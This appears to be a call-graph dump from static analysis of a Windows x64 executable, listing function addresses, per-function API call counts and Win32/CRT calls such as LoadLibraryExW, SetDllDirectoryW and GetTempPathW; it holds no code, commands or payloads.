7ff75aea00bc 17119->17478 17123 7ff75ae91c80 49 API calls 17120->17123 17125 7ff75ae939a3 17123->17125 17126 7ff75ae98a20 14 API calls 17124->17126 17134 7ff75ae938de __std_exception_destroy 17124->17134 17129 7ff75ae91950 115 API calls 17125->17129 17126->17134 17127 7ff75ae98b30 40 API calls 17128 7ff75ae93a0b 17127->17128 17130 7ff75ae98b90 40 API calls 17128->17130 17131 7ff75ae939ce 17129->17131 17132 7ff75ae93a17 17130->17132 17131->17112 17133 7ff75ae939de 17131->17133 17135 7ff75ae98b90 40 API calls 17132->17135 17136 7ff75ae92710 54 API calls 17133->17136 17134->17127 17139 7ff75ae9390e __std_exception_destroy 17134->17139 17137 7ff75ae93a23 17135->17137 17145 7ff75ae93808 __std_exception_destroy 17136->17145 17138 7ff75ae98b90 40 API calls 17137->17138 17138->17139 17140 7ff75ae98a20 14 API calls 17139->17140 17141 7ff75ae93a3b 17140->17141 17142 7ff75ae93b2f 17141->17142 17143 7ff75ae93a60 __std_exception_destroy 17141->17143 17144 7ff75ae92710 54 API calls 17142->17144 17154 7ff75ae93aab 17143->17154 17368 7ff75ae98b30 17143->17368 17144->17145 17145->17104 17147 7ff75ae98a20 14 API calls 17148 7ff75ae93bf4 __std_exception_destroy 17147->17148 17149 7ff75ae93d41 17148->17149 17150 7ff75ae93c46 17148->17150 17493 7ff75ae944d0 17149->17493 17151 7ff75ae93c50 17150->17151 17152 7ff75ae93cd4 17150->17152 17375 7ff75ae990e0 17151->17375 17156 7ff75ae98a20 14 API calls 17152->17156 17154->17147 17159 7ff75ae93ce0 17156->17159 17157 7ff75ae93d4f 17160 7ff75ae93d71 17157->17160 17161 7ff75ae93d65 17157->17161 17162 7ff75ae93c61 17159->17162 17166 7ff75ae93ced 17159->17166 17164 7ff75ae91c80 49 API calls 17160->17164 17496 7ff75ae94620 17161->17496 17169 7ff75ae92710 54 API calls 17162->17169 17176 7ff75ae93cc8 __std_exception_destroy 17164->17176 17170 7ff75ae91c80 49 API calls 17166->17170 17167 7ff75ae93dc4 17425 7ff75ae99400 17167->17425 17169->17145 17172 7ff75ae93d0b 17170->17172 17175 7ff75ae93d12 17172->17175 17172->17176 17173 7ff75ae93da7 SetDllDirectoryW LoadLibraryExW 17173->17167 17174 7ff75ae93dd7 SetDllDirectoryW 17179 7ff75ae93e0a 17174->17179 17222 7ff75ae93e5a 17174->17222 17177 7ff75ae92710 54 API calls 17175->17177 17176->17167 17176->17173 17177->17145 17181 7ff75ae98a20 14 API calls 17179->17181 17180 7ff75ae93ffc 17183 7ff75ae94006 PostMessageW GetMessageW 17180->17183 17184 7ff75ae94029 17180->17184 17187 7ff75ae93e16 __std_exception_destroy 17181->17187 17182 7ff75ae93f1b 17430 7ff75ae933c0 17182->17430 17183->17184 17573 7ff75ae93360 17184->17573 17189 7ff75ae93ef2 17187->17189 17193 7ff75ae93e4e 17187->17193 17192 7ff75ae98b30 40 API calls 17189->17192 17192->17222 17193->17222 17499 7ff75ae96db0 17193->17499 17222->17180 17222->17182 17232 7ff75aea9bb3 17231->17232 17233 7ff75aea9bd4 17231->17233 17232->17077 17234 7ff75aeaa448 45 API calls 17233->17234 17235 7ff75aea9bd9 17234->17235 17237 7ff75ae9d339 17236->17237 17237->17085 17240 7ff75ae9d011 17238->17240 17239 7ff75ae9cdd0 17239->17075 17240->17239 17241 7ff75ae9d8f8 7 API calls 17240->17241 17241->17239 17243 7ff75ae9d1c2 _isindst memcpy_s 17242->17243 17244 7ff75ae9d1e1 RtlCaptureContext RtlLookupFunctionEntry 17243->17244 17245 7ff75ae9d20a RtlVirtualUnwind 17244->17245 17246 7ff75ae9d246 memcpy_s 17244->17246 17245->17246 17247 7ff75ae9d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17246->17247 17248 7ff75ae9d2c6 _isindst 17247->17248 17248->17073 17250 7ff75ae9d900 17249->17250 17251 7ff75ae9d90a 17249->17251 17255 7ff75ae9dc94 17250->17255 17251->17091 17256 7ff75ae9d905 17255->17256 17257 7ff75ae9dca3 17255->17257 17259 7ff75ae9dd00 17256->17259 17263 7ff75ae9ded0 17257->17263 17260 7ff75ae9dd2b 17259->17260 17261 7ff75ae9dd2f 17260->17261 17262 7ff75ae9dd0e DeleteCriticalSection 17260->17262 17261->17251 17262->17260 17267 7ff75ae9dd38 17263->17267 17268 7ff75ae9de22 TlsFree 17267->17268 17273 7ff75ae9dd7c __vcrt_FlsAlloc 17267->17273 17269 7ff75ae9ddaa LoadLibraryExW 17271 7ff75ae9de49 17269->17271 17272 7ff75ae9ddcb GetLastError 17269->17272 17270 7ff75ae9de69 GetProcAddress 17270->17268 17271->17270 17274 7ff75ae9de60 FreeLibrary 17271->17274 17272->17273 17273->17268 17273->17269 17273->17270 17275 7ff75ae9dded LoadLibraryExW 17273->17275 17274->17270 17275->17271 17275->17273 17277 7ff75aeaf4f0 17276->17277 17278 7ff75aeaf543 17277->17278 17280 7ff75aeaf596 17277->17280 17279 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17278->17279 17282 7ff75aeaf56c 17279->17282 17586 7ff75aeaf3c8 17280->17586 17282->17100 17594 7ff75ae9c8c0 17283->17594 17286 7ff75ae93710 17596 7ff75ae992f0 FindFirstFileExW 17286->17596 17287 7ff75ae936eb GetLastError 17601 7ff75ae92c50 17287->17601 17291 7ff75ae93706 17295 7ff75ae9c5c0 _log10_special 8 API calls 17291->17295 17292 7ff75ae93723 17616 7ff75ae99370 CreateFileW 17292->17616 17293 7ff75ae9377d 17627 7ff75ae994b0 17293->17627 17298 7ff75ae937b5 17295->17298 17297 7ff75ae9378b 17297->17291 17303 7ff75ae92810 49 API calls 17297->17303 17298->17145 17305 7ff75ae91950 17298->17305 17300 7ff75ae93734 17619 7ff75ae92810 17300->17619 17301 7ff75ae9374c __vcrt_FlsAlloc 17301->17293 17303->17291 17306 7ff75ae945b0 108 API calls 17305->17306 17307 7ff75ae91985 17306->17307 17308 7ff75ae91c43 17307->17308 17310 7ff75ae97f80 83 API calls 17307->17310 17309 7ff75ae9c5c0 _log10_special 8 API calls 17308->17309 17312 7ff75ae91c5e 17309->17312 17311 7ff75ae919cb 17310->17311 17354 7ff75ae91a03 17311->17354 17972 7ff75aea0744 17311->17972 17312->17107 17312->17108 17314 7ff75aea00bc 74 API calls 17314->17308 17315 7ff75ae919e5 17316 7ff75ae91a08 17315->17316 17317 7ff75ae919e9 17315->17317 17976 7ff75aea040c 17316->17976 17318 7ff75aea4f78 _set_fmode 11 API calls 17317->17318 17320 7ff75ae919ee 17318->17320 17979 7ff75ae92910 17320->17979 17323 7ff75ae91a45 17327 7ff75ae91a7b 17323->17327 17328 7ff75ae91a5c 17323->17328 17324 7ff75ae91a26 17325 7ff75aea4f78 _set_fmode 11 API calls 17324->17325 17326 7ff75ae91a2b 17325->17326 17329 7ff75ae92910 54 API calls 17326->17329 17331 7ff75ae91c80 49 API calls 17327->17331 17330 7ff75aea4f78 _set_fmode 11 API calls 17328->17330 17329->17354 17332 7ff75ae91a61 17330->17332 17333 7ff75ae91a92 17331->17333 17334 7ff75ae92910 54 API calls 17332->17334 17335 7ff75ae91c80 49 API calls 17333->17335 17334->17354 17336 7ff75ae91add 17335->17336 17337 7ff75aea0744 73 API calls 17336->17337 17338 7ff75ae91b01 17337->17338 17339 7ff75ae91b35 17338->17339 17340 7ff75ae91b16 17338->17340 17342 7ff75aea040c _fread_nolock 53 API calls 17339->17342 17341 7ff75aea4f78 _set_fmode 11 API calls 17340->17341 17343 7ff75ae91b1b 17341->17343 17344 7ff75ae91b4a 17342->17344 17345 7ff75ae92910 54 API calls 17343->17345 17346 7ff75ae91b6f 17344->17346 17347 7ff75ae91b50 17344->17347 17345->17354 17994 7ff75aea0180 17346->17994 17349 7ff75aea4f78 _set_fmode 11 API calls 17347->17349 17351 7ff75ae91b55 17349->17351 17352 7ff75ae92910 54 API calls 17351->17352 17352->17354 17353 7ff75ae92710 54 API calls 17353->17354 17354->17314 17356 7ff75ae98a2a 17355->17356 17357 7ff75ae99400 2 API calls 17356->17357 17358 7ff75ae98a49 GetEnvironmentVariableW 17357->17358 17359 7ff75ae98ab2 17358->17359 17360 7ff75ae98a66 ExpandEnvironmentStringsW 17358->17360 17361 7ff75ae9c5c0 _log10_special 8 API calls 17359->17361 17360->17359 17362 7ff75ae98a88 17360->17362 17363 7ff75ae98ac4 17361->17363 17364 7ff75ae994b0 2 API calls 17362->17364 17363->17117 17365 7ff75ae98a9a 17364->17365 17366 7ff75ae9c5c0 _log10_special 8 API calls 17365->17366 17367 7ff75ae98aaa 17366->17367 17367->17117 17369 7ff75ae99400 2 API calls 17368->17369 17370 7ff75ae98b4c 17369->17370 17371 7ff75ae99400 2 API calls 17370->17371 17372 7ff75ae98b5c 17371->17372 18209 7ff75aea82a8 17372->18209 17374 7ff75ae98b6a __std_exception_destroy 17374->17154 17376 7ff75ae990f5 17375->17376 18227 7ff75ae98760 GetCurrentProcess OpenProcessToken 17376->18227 17379 7ff75ae98760 7 API calls 17380 7ff75ae99121 17379->17380 17381 7ff75ae99154 17380->17381 17382 7ff75ae9913a 17380->17382 17383 7ff75ae926b0 48 API calls 17381->17383 17384 7ff75ae926b0 48 API calls 17382->17384 17385 7ff75ae99167 LocalFree LocalFree 17383->17385 17386 7ff75ae99152 17384->17386 17387 7ff75ae99183 17385->17387 17389 7ff75ae9918f 17385->17389 17386->17385 18237 7ff75ae92b50 17387->18237 17390 7ff75ae9c5c0 _log10_special 8 API calls 17389->17390 17391 7ff75ae93c55 17390->17391 17391->17162 17392 7ff75ae98850 17391->17392 17393 7ff75ae98868 17392->17393 17394 7ff75ae988ea GetTempPathW GetCurrentProcessId 17393->17394 17395 7ff75ae9888c 17393->17395 18246 7ff75ae925c0 17394->18246 17397 7ff75ae98a20 14 API calls 17395->17397 17398 7ff75ae98898 17397->17398 18253 7ff75ae981c0 17398->18253 17405 7ff75ae98918 __std_exception_destroy 17415 7ff75ae98955 __std_exception_destroy 17405->17415 18250 7ff75aea8bd8 17405->18250 17410 7ff75ae9c5c0 _log10_special 8 API calls 17411 7ff75ae93cbb 17410->17411 17411->17162 17411->17176 17416 7ff75ae99400 2 API calls 17415->17416 17424 7ff75ae989c4 __std_exception_destroy 17415->17424 17417 7ff75ae989a1 17416->17417 17418 7ff75ae989a6 17417->17418 17419 7ff75ae989d9 17417->17419 17420 7ff75ae99400 2 API calls 17418->17420 17421 7ff75aea82a8 38 API calls 17419->17421 17421->17424 17424->17410 17426 7ff75ae99422 MultiByteToWideChar 17425->17426 17427 7ff75ae99446 17425->17427 17426->17427 17429 7ff75ae9945c __std_exception_destroy 17426->17429 17428 7ff75ae99463 MultiByteToWideChar 17427->17428 17427->17429 17428->17429 17429->17174 17442 7ff75ae933ce memcpy_s 17430->17442 17431 7ff75ae935c7 17432 7ff75ae9c5c0 _log10_special 8 API calls 17431->17432 17433 7ff75ae93664 17432->17433 17433->17145 17449 7ff75ae990c0 LocalFree 17433->17449 17435 7ff75ae91c80 49 API calls 17435->17442 17436 7ff75ae935e2 17438 7ff75ae92710 54 API calls 17436->17438 17438->17431 17441 7ff75ae935c9 17444 7ff75ae92710 54 API calls 17441->17444 17442->17431 17442->17435 17442->17436 17442->17441 17443 7ff75ae92a50 54 API calls 17442->17443 17447 7ff75ae935d0 17442->17447 18415 7ff75ae94550 17442->18415 18421 7ff75ae97e10 17442->18421 18432 7ff75ae91600 17442->18432 18480 7ff75ae97110 17442->18480 18484 7ff75ae94180 17442->18484 18528 7ff75ae94440 17442->18528 17443->17442 17444->17431 17448 7ff75ae92710 54 API calls 17447->17448 17448->17431 17451 7ff75ae91ca5 17450->17451 17452 7ff75aea49f4 49 API calls 17451->17452 17453 7ff75ae91cc8 17452->17453 17453->17112 17455 7ff75ae99400 2 API calls 17454->17455 17456 7ff75ae98ba4 17455->17456 17457 7ff75aea82a8 38 API calls 17456->17457 17458 7ff75ae98bb6 __std_exception_destroy 17457->17458 17458->17124 17460 7ff75ae945bc 17459->17460 17461 7ff75ae99400 2 API calls 17460->17461 17462 7ff75ae945e4 17461->17462 17463 7ff75ae99400 2 API calls 17462->17463 17464 7ff75ae945f7 17463->17464 18695 7ff75aea6004 17464->18695 17467 7ff75ae9c5c0 _log10_special 8 API calls 17468 7ff75ae9392b 17467->17468 17468->17113 17469 7ff75ae97f80 17468->17469 17470 7ff75ae97fa4 17469->17470 17471 7ff75aea0744 73 API calls 17470->17471 17472 7ff75ae9807b __std_exception_destroy 17470->17472 17473 7ff75ae97fc0 17471->17473 17472->17118 17473->17472 19086 7ff75aea7938 17473->19086 17475 7ff75aea0744 73 API calls 17477 7ff75ae97fd5 17475->17477 17476 7ff75aea040c _fread_nolock 53 API calls 17476->17477 17477->17472 17477->17475 17477->17476 17479 7ff75aea00ec 17478->17479 19101 7ff75ae9fe98 17479->19101 17481 7ff75aea0105 17481->17113 17483 7ff75ae9c8c0 17482->17483 17484 7ff75ae92734 GetCurrentProcessId 17483->17484 17485 7ff75ae91c80 49 API calls 17484->17485 17486 7ff75ae92787 17485->17486 17487 7ff75aea49f4 49 API calls 17486->17487 17488 7ff75ae927cf 17487->17488 17489 7ff75ae92620 12 API calls 17488->17489 17490 7ff75ae927f1 17489->17490 17491 7ff75ae9c5c0 _log10_special 8 API calls 17490->17491 17492 7ff75ae92801 17491->17492 17492->17145 17494 7ff75ae91c80 49 API calls 17493->17494 17495 7ff75ae944ed 17494->17495 17495->17157 17497 7ff75ae91c80 49 API calls 17496->17497 17498 7ff75ae94650 17497->17498 17498->17176 17500 7ff75ae96dc5 17499->17500 17501 7ff75ae93e6c 17500->17501 17502 7ff75aea4f78 _set_fmode 11 API calls 17500->17502 17505 7ff75ae97330 17501->17505 17503 7ff75ae96dd2 17502->17503 17504 7ff75ae92910 54 API calls 17503->17504 17504->17501 19112 7ff75ae91470 17505->19112 17507 7ff75ae97358 19218 7ff75ae96350 17573->19218 17581 7ff75ae93399 17582 7ff75ae93670 17581->17582 17593 7ff75aea54dc EnterCriticalSection 17586->17593 17595 7ff75ae936bc GetModuleFileNameW 17594->17595 17595->17286 17595->17287 17597 7ff75ae9932f FindClose 17596->17597 17598 7ff75ae99342 17596->17598 17597->17598 17599 7ff75ae9c5c0 _log10_special 8 API calls 17598->17599 17600 7ff75ae9371a 17599->17600 17600->17292 17600->17293 17602 7ff75ae9c8c0 17601->17602 17603 7ff75ae92c70 GetCurrentProcessId 17602->17603 17632 7ff75ae926b0 17603->17632 17605 7ff75ae92cb9 17636 7ff75aea4c48 17605->17636 17608 7ff75ae926b0 48 API calls 17609 7ff75ae92d34 FormatMessageW 17608->17609 17611 7ff75ae92d7f MessageBoxW 17609->17611 17612 7ff75ae92d6d 17609->17612 17614 7ff75ae9c5c0 _log10_special 8 API calls 17611->17614 17613 7ff75ae926b0 48 API calls 17612->17613 17613->17611 17615 7ff75ae92daf 17614->17615 17615->17291 17617 7ff75ae993b0 GetFinalPathNameByHandleW CloseHandle 17616->17617 17618 7ff75ae93730 17616->17618 17617->17618 17618->17300 17618->17301 17620 7ff75ae92834 17619->17620 17621 7ff75ae926b0 48 API calls 17620->17621 17622 7ff75ae92887 17621->17622 17623 7ff75aea4c48 48 API calls 17622->17623 17624 7ff75ae928d0 MessageBoxW 17623->17624 17625 7ff75ae9c5c0 _log10_special 8 API calls 17624->17625 17626 7ff75ae92900 17625->17626 17626->17291 17628 7ff75ae994da WideCharToMultiByte 17627->17628 17631 7ff75ae99505 17627->17631 17630 7ff75ae9951b __std_exception_destroy 17628->17630 17628->17631 17629 7ff75ae99522 WideCharToMultiByte 17629->17630 17630->17297 17631->17629 17631->17630 17633 7ff75ae926d5 17632->17633 17634 7ff75aea4c48 48 API calls 17633->17634 17635 7ff75ae926f8 17634->17635 17635->17605 17638 7ff75aea4ca2 17636->17638 17637 7ff75aea4cc7 17639 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17637->17639 17638->17637 17640 7ff75aea4d03 17638->17640 17643 7ff75aea4cf1 17639->17643 17654 7ff75aea3000 17640->17654 17642 7ff75aea4de4 17645 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17642->17645 17644 7ff75ae9c5c0 _log10_special 8 API calls 17643->17644 17647 7ff75ae92d04 17644->17647 17645->17643 17647->17608 17648 7ff75aea4e0a 17648->17642 17650 7ff75aea4e14 17648->17650 17649 7ff75aea4db9 17651 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17649->17651 17653 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17650->17653 17651->17643 17652 7ff75aea4db0 17652->17642 17652->17649 17653->17643 17655 7ff75aea303e 17654->17655 17656 7ff75aea302e 17654->17656 17657 7ff75aea3047 17655->17657 17662 7ff75aea3075 17655->17662 17658 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17656->17658 17659 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17657->17659 17660 7ff75aea306d 17658->17660 17659->17660 17660->17642 17660->17648 17660->17649 17660->17652 17662->17656 17662->17660 17665 7ff75aea3a14 17662->17665 17698 7ff75aea3460 17662->17698 17735 7ff75aea2bf0 17662->17735 17666 7ff75aea3a56 17665->17666 17667 7ff75aea3ac7 17665->17667 17668 7ff75aea3af1 17666->17668 17669 7ff75aea3a5c 17666->17669 17670 7ff75aea3b20 17667->17670 17671 7ff75aea3acc 17667->17671 17758 7ff75aea1dc4 17668->17758 17672 7ff75aea3a90 17669->17672 17673 7ff75aea3a61 17669->17673 17677 7ff75aea3b37 17670->17677 17680 7ff75aea3b2a 17670->17680 17681 7ff75aea3b2f 17670->17681 17674 7ff75aea3b01 17671->17674 17675 7ff75aea3ace 17671->17675 17678 7ff75aea3a67 17672->17678 17672->17681 17673->17677 17673->17678 17765 7ff75aea19b4 17674->17765 17679 7ff75aea3a70 17675->17679 17687 7ff75aea3add 17675->17687 17772 7ff75aea471c 17677->17772 17678->17679 17685 7ff75aea3aa2 17678->17685 17693 7ff75aea3a8b 17678->17693 17696 7ff75aea3b60 17679->17696 17738 7ff75aea41c8 17679->17738 17680->17668 17680->17681 17681->17696 17776 7ff75aea21d4 17681->17776 17685->17696 17748 7ff75aea4504 17685->17748 17687->17668 17688 7ff75aea3ae2 17687->17688 17688->17696 17754 7ff75aea45c8 17688->17754 17690 7ff75ae9c5c0 _log10_special 8 API calls 17692 7ff75aea3e5a 17690->17692 17692->17662 17693->17696 17697 7ff75aea3d4c 17693->17697 17783 7ff75aea4830 17693->17783 17696->17690 17697->17696 17789 7ff75aeaea78 17697->17789 17699 7ff75aea3484 17698->17699 17700 7ff75aea346e 17698->17700 17701 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17699->17701 17704 7ff75aea34c4 17699->17704 17702 7ff75aea3a56 17700->17702 17703 7ff75aea3ac7 17700->17703 17700->17704 17701->17704 17705 7ff75aea3af1 17702->17705 17706 7ff75aea3a5c 17702->17706 17707 7ff75aea3b20 17703->17707 17708 7ff75aea3acc 17703->17708 17704->17662 17714 7ff75aea1dc4 38 API calls 17705->17714 17709 7ff75aea3a90 17706->17709 17710 7ff75aea3a61 17706->17710 17713 7ff75aea3b2f 17707->17713 17715 7ff75aea3b37 17707->17715 17716 7ff75aea3b2a 17707->17716 17711 7ff75aea3b01 17708->17711 17712 7ff75aea3ace 17708->17712 17709->17713 17718 7ff75aea3a67 17709->17718 17710->17715 17710->17718 17719 7ff75aea19b4 38 API calls 17711->17719 17723 7ff75aea3add 17712->17723 17724 7ff75aea3a70 17712->17724 17722 7ff75aea21d4 38 API calls 17713->17722 17733 7ff75aea3b60 17713->17733 17730 7ff75aea3a8b 17714->17730 17717 7ff75aea471c 45 API calls 17715->17717 17716->17705 17716->17713 17717->17730 17721 7ff75aea3aa2 17718->17721 17718->17724 17718->17730 17719->17730 17720 7ff75aea41c8 47 API calls 17720->17730 17725 7ff75aea4504 46 API calls 17721->17725 17721->17733 17722->17730 17723->17705 17726 7ff75aea3ae2 17723->17726 17724->17720 17724->17733 17725->17730 17728 7ff75aea45c8 37 API calls 17726->17728 17726->17733 17727 7ff75ae9c5c0 _log10_special 8 API calls 17729 7ff75aea3e5a 17727->17729 17728->17730 17729->17662 17731 7ff75aea4830 45 API calls 17730->17731 17730->17733 17734 7ff75aea3d4c 17730->17734 17731->17734 17732 7ff75aeaea78 46 API calls 17732->17734 17733->17727 17734->17732 17734->17733 17955 7ff75aea1038 17735->17955 17739 7ff75aea41ee 17738->17739 17801 7ff75aea0bf0 17739->17801 17744 7ff75aea4830 45 API calls 17745 7ff75aea4333 17744->17745 17746 7ff75aea4830 45 API calls 17745->17746 17747 7ff75aea43c1 17745->17747 17746->17747 17747->17693 17750 7ff75aea4539 17748->17750 17749 7ff75aea457e 17749->17693 17750->17749 17751 7ff75aea4557 17750->17751 17752 7ff75aea4830 45 API calls 17750->17752 17753 7ff75aeaea78 46 API calls 17751->17753 17752->17751 17753->17749 17757 7ff75aea45e9 17754->17757 17755 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17756 7ff75aea461a 17755->17756 17756->17693 17757->17755 17757->17756 17759 7ff75aea1df7 17758->17759 17760 7ff75aea1e26 17759->17760 17762 7ff75aea1ee3 17759->17762 17764 7ff75aea1e63 17760->17764 17928 7ff75aea0c98 17760->17928 17763 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17762->17763 17763->17764 17764->17693 17766 7ff75aea19e7 17765->17766 17767 7ff75aea1a16 17766->17767 17769 7ff75aea1ad3 17766->17769 17768 7ff75aea0c98 12 API calls 17767->17768 17771 7ff75aea1a53 17767->17771 17768->17771 17770 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17769->17770 17770->17771 17771->17693 17773 7ff75aea475f 17772->17773 17774 7ff75aea4763 __crtLCMapStringW 17773->17774 17936 7ff75aea47b8 17773->17936 17774->17693 17777 7ff75aea2207 17776->17777 17778 7ff75aea2236 17777->17778 17780 7ff75aea22f3 17777->17780 17779 7ff75aea0c98 12 API calls 17778->17779 17782 7ff75aea2273 17778->17782 17779->17782 17781 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17780->17781 17781->17782 17782->17693 17784 7ff75aea4847 17783->17784 17940 7ff75aeada28 17784->17940 17790 7ff75aeaeaa9 17789->17790 17798 7ff75aeaeab7 17789->17798 17791 7ff75aeaead7 17790->17791 17792 7ff75aea4830 45 API calls 17790->17792 17790->17798 17793 7ff75aeaeae8 17791->17793 17795 7ff75aeaeb0f 17791->17795 17792->17791 17948 7ff75aeb0110 17793->17948 17796 7ff75aeaeb39 17795->17796 17797 7ff75aeaeb9a 17795->17797 17795->17798 17796->17798 17800 7ff75aeaf910 _fread_nolock MultiByteToWideChar 17796->17800 17799 7ff75aeaf910 _fread_nolock MultiByteToWideChar 17797->17799 17798->17697 17799->17798 17800->17798 17802 7ff75aea0c27 17801->17802 17808 7ff75aea0c16 17801->17808 17803 7ff75aead66c _fread_nolock 12 API calls 17802->17803 17802->17808 17804 7ff75aea0c54 17803->17804 17805 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17804->17805 17807 7ff75aea0c68 17804->17807 17805->17807 17806 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17806->17808 17807->17806 17809 7ff75aeae5e0 17808->17809 17810 7ff75aeae630 17809->17810 17811 7ff75aeae5fd 17809->17811 17810->17811 17813 7ff75aeae662 17810->17813 17812 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17811->17812 17828 7ff75aea4311 17812->17828 17818 7ff75aeae775 17813->17818 17821 7ff75aeae6aa 17813->17821 17814 7ff75aeae867 17855 7ff75aeadacc 17814->17855 17816 7ff75aeae82d 17848 7ff75aeade64 17816->17848 17818->17814 17818->17816 17819 7ff75aeae7fc 17818->17819 17822 7ff75aeae7bf 17818->17822 17823 7ff75aeae7b5 17818->17823 17841 7ff75aeae144 17819->17841 17826 7ff75aeaa514 __std_exception_copy 37 API calls 17821->17826 17821->17828 17831 7ff75aeae374 17822->17831 17823->17816 17825 7ff75aeae7ba 17823->17825 17825->17819 17825->17822 17827 7ff75aeae762 17826->17827 17827->17828 17829 7ff75aeaa970 _isindst 17 API calls 17827->17829 17828->17744 17828->17745 17830 7ff75aeae8c4 17829->17830 17864 7ff75aeb411c 17831->17864 17835 7ff75aeae41c 17836 7ff75aeae420 17835->17836 17837 7ff75aeae471 17835->17837 17838 7ff75aeae43c 17835->17838 17836->17828 17917 7ff75aeadf60 17837->17917 17913 7ff75aeae21c 17838->17913 17842 7ff75aeb411c 38 API calls 17841->17842 17843 7ff75aeae18e 17842->17843 17844 7ff75aeb3b64 37 API calls 17843->17844 17845 7ff75aeae1de 17844->17845 17846 7ff75aeae1e2 17845->17846 17847 7ff75aeae21c 45 API calls 17845->17847 17846->17828 17847->17846 17849 7ff75aeb411c 38 API calls 17848->17849 17850 7ff75aeadeaf 17849->17850 17851 7ff75aeb3b64 37 API calls 17850->17851 17852 7ff75aeadf07 17851->17852 17853 7ff75aeadf0b 17852->17853 17854 7ff75aeadf60 45 API calls 17852->17854 17853->17828 17854->17853 17856 7ff75aeadb11 17855->17856 17857 7ff75aeadb44 17855->17857 17858 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17856->17858 17859 7ff75aeadb5c 17857->17859 17861 7ff75aeadbdd 17857->17861 17863 7ff75aeadb3d memcpy_s 17858->17863 17860 7ff75aeade64 46 API calls 17859->17860 17860->17863 17862 7ff75aea4830 45 API calls 17861->17862 17861->17863 17862->17863 17863->17828 17865 7ff75aeb416f fegetenv 17864->17865 17866 7ff75aeb7e9c 37 API calls 17865->17866 17871 7ff75aeb41c2 17866->17871 17867 7ff75aeb41ef 17870 7ff75aeaa514 __std_exception_copy 37 API calls 17867->17870 17868 7ff75aeb42b2 17869 7ff75aeb7e9c 37 API calls 17868->17869 17872 7ff75aeb42dc 17869->17872 17873 7ff75aeb426d 17870->17873 17871->17868 17874 7ff75aeb41dd 17871->17874 17875 7ff75aeb428c 17871->17875 17876 7ff75aeb7e9c 37 API calls 17872->17876 17877 7ff75aeb5394 17873->17877 17883 7ff75aeb4275 17873->17883 17874->17867 17874->17868 17878 7ff75aeaa514 __std_exception_copy 37 API calls 17875->17878 17879 7ff75aeb42ed 17876->17879 17880 7ff75aeaa970 _isindst 17 API calls 17877->17880 17878->17873 17881 7ff75aeb8090 20 API calls 17879->17881 17882 7ff75aeb53a9 17880->17882 17891 7ff75aeb4356 memcpy_s 17881->17891 17884 7ff75ae9c5c0 _log10_special 8 API calls 17883->17884 17885 7ff75aeae3c1 17884->17885 17909 7ff75aeb3b64 17885->17909 17886 7ff75aeb46ff memcpy_s 17887 7ff75aeb4a3f 17888 7ff75aeb3c80 37 API calls 17887->17888 17897 7ff75aeb5157 17888->17897 17889 7ff75aeb49eb 17889->17887 17892 7ff75aeb53ac memcpy_s 37 API calls 17889->17892 17890 7ff75aeb4397 memcpy_s 17896 7ff75aeb4cdb memcpy_s 17890->17896 17900 7ff75aeb47f3 memcpy_s 17890->17900 17891->17886 17891->17890 17893 7ff75aea4f78 _set_fmode 11 API calls 17891->17893 17892->17887 17895 7ff75aeb47d0 17893->17895 17894 7ff75aeb5338 17902 7ff75aeb7e9c 37 API calls 17894->17902 17898 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17895->17898 17896->17887 17896->17889 17901 7ff75aea4f78 11 API calls _set_fmode 17896->17901 17905 7ff75aeaa950 37 API calls _invalid_parameter_noinfo 17896->17905 17899 7ff75aeb53ac memcpy_s 37 API calls 17897->17899 17908 7ff75aeb51b2 17897->17908 17898->17890 17899->17908 17900->17889 17903 7ff75aea4f78 11 API calls _set_fmode 17900->17903 17906 7ff75aeaa950 37 API calls _invalid_parameter_noinfo 17900->17906 17901->17896 17902->17883 17903->17900 17904 7ff75aeb3c80 37 API calls 17904->17908 17905->17896 17906->17900 17907 7ff75aeb53ac memcpy_s 37 API calls 17907->17908 17908->17894 17908->17904 17908->17907 17910 7ff75aeb3b83 17909->17910 17911 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17910->17911 17912 7ff75aeb3bae memcpy_s 17910->17912 17911->17912 17912->17835 17914 7ff75aeae248 memcpy_s 17913->17914 17915 7ff75aea4830 45 API calls 17914->17915 17916 7ff75aeae302 memcpy_s 17914->17916 17915->17916 17916->17836 17918 7ff75aeadf9b 17917->17918 17923 7ff75aeadfe8 memcpy_s 17917->17923 17919 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17918->17919 17920 7ff75aeadfc7 17919->17920 17920->17836 17921 7ff75aeae053 17922 7ff75aeaa514 __std_exception_copy 37 API calls 17921->17922 17927 7ff75aeae095 memcpy_s 17922->17927 17923->17921 17924 7ff75aea4830 45 API calls 17923->17924 17924->17921 17925 7ff75aeaa970 _isindst 17 API calls 17926 7ff75aeae140 17925->17926 17927->17925 17929 7ff75aea0ccf 17928->17929 17934 7ff75aea0cbe 17928->17934 17930 7ff75aead66c _fread_nolock 12 API calls 17929->17930 17929->17934 17931 7ff75aea0d00 17930->17931 17932 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17931->17932 17935 7ff75aea0d14 17931->17935 17932->17935 17933 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17933->17934 17934->17764 17935->17933 17937 7ff75aea47d6 17936->17937 17939 7ff75aea47de 17936->17939 17938 7ff75aea4830 45 API calls 17937->17938 17938->17939 17939->17774 17941 7ff75aeada41 17940->17941 17942 7ff75aea486f 17940->17942 17941->17942 17943 7ff75aeb3374 45 API calls 